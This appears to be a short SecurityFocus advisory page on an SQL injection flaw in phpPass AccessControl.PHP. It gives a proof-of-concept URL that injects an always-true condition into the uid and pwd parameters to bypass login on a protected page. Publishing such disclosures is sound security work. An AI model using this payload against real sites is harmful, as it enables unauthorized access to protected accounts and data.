info
discussion
exploit
solution
references
phpPass AccessControl.PHP SQL Injection Vulnerability
The following proof of concept was provided:
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
Privacy Statement
Copyright 2010, SecurityFocus
